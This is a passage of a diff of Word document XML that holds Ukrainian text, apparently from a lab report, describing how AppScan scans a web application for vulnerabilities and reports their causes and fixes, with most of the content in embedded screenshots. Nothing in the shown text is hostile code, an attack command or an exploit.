+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08696EEB" wp14:editId="4FD0D36F">
+            <wp:extent cx="5940425" cy="3586082"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="10" name="Рисунок 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="3586082"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В результаті виконаних дій </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>збереже алгоритм авторизації у вигляді запитів до сервера, які треба виконати. Виконання входу до облікового запису допоможе відшукати більше вразливостей в додатку.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Після цих дій почнеться сканування веб-додатку, яке відбувається в декілька етапів:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-індексація посилань</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>( створення дерева веб-додатку)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-аналіз, що полягає в підготовці об</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>єктів та створенні тестів</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-тестування, де виконується збір інформації, виконання тестів та очистка тимчасових даних.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194C2DA8" wp14:editId="1A8041D4">
+            <wp:extent cx="5940425" cy="2813563"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
+            <wp:docPr id="11" name="Рисунок 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="2813563"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Після завершення тестування програма видає список знайдених вразливостей відсортованих по серйозності:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456A138B" wp14:editId="117C97D0">
+            <wp:extent cx="5940425" cy="3594052"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
+            <wp:docPr id="13" name="Рисунок 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="3594052"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Для кожної знайденої вразливості можна подивитись детальну інформацію</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> про те, як було модифіковано запит і яку відповідь в результаті було отримано</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8B1A5" wp14:editId="5B23F1CA">
+            <wp:extent cx="4203190" cy="6020230"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
+            <wp:docPr id="14" name="Рисунок 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4204123" cy="6021567"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFAD20" wp14:editId="47A156D4">
+            <wp:extent cx="5332780" cy="4331061"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="15" name="Рисунок 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5338300" cy="4335544"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Коментарі з можливими причинами виникнення </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>дефекту:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138CD152" wp14:editId="1C46E326">
+            <wp:extent cx="3467404" cy="4170260"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="16" name="Рисунок 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3470856" cy="4174411"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Та поради щодо способів виправлення вихідного код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>у з метою виправити вразливість:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69E524" wp14:editId="647F1360">
+            <wp:extent cx="5940425" cy="7144573"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="17" name="Рисунок 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="7144573"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -30600,6 +29158,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="10">
+    <w:nsid w:val="5DA5576D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="860E3FEC"/>
+    <w:lvl w:ilvl="0" w:tplc="E062D4C0">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04190005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04190001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
